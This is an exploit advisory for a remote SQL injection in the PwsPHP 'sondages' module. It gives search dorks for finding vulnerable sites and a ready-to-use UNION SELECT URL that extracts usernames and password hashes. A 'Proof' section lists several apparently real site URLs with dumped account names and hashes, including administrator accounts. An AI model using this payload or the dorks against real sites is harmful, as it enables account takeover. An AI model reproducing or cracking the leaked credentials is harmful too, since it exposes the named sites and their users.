PwsPHP sondages Module Remote SQL Injection Exploit

[+] Author: d3hydr8
[+] Original Post: http://darkcode.h1x.com/forum/

[+] Description: The sql injection for KwsPHP put out by "H-T Team" also
works for PwsPHP.

[+] Site: http://pwsphp.com

[+]    Dork: Réalisé avec Pwsphp
        Dork: inurl:/pwsphp/index.php

[+] Sql:

     index.php
?mod=sondages&do=results&id=-1%20union%20select%201,2,3,concat(pseudo,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20where%20id=1--

[+] Thanks: H-T Team, mozi, str0ke


[+] Proof:

animeaction:5164dcaaecb8d1a45b1070db28583599
http://logx31.free.fr/

http://didierben.free.fr
administrateur:07402a114f1e03e5003e19c013a4815e

fabieeen:85f9e6d66aa61ea4196fdc1bfa4f2781
http://fack.laverre.info
http://fack.laverre.info/pwsphp/index.php

http://www.forumas400.com/pwsphp/index.php
shewolf:17b20843dd9f92a79dbb8aceb021bb87

tlo:638c7f5b58870b16303996cc99ce42e9
http://bvbrugby.free.fr/pwsphp/index.php

admin:29677311818d4d9aab364e975bde366b
http://burdigalasong.free.fr/pwsphp/index.php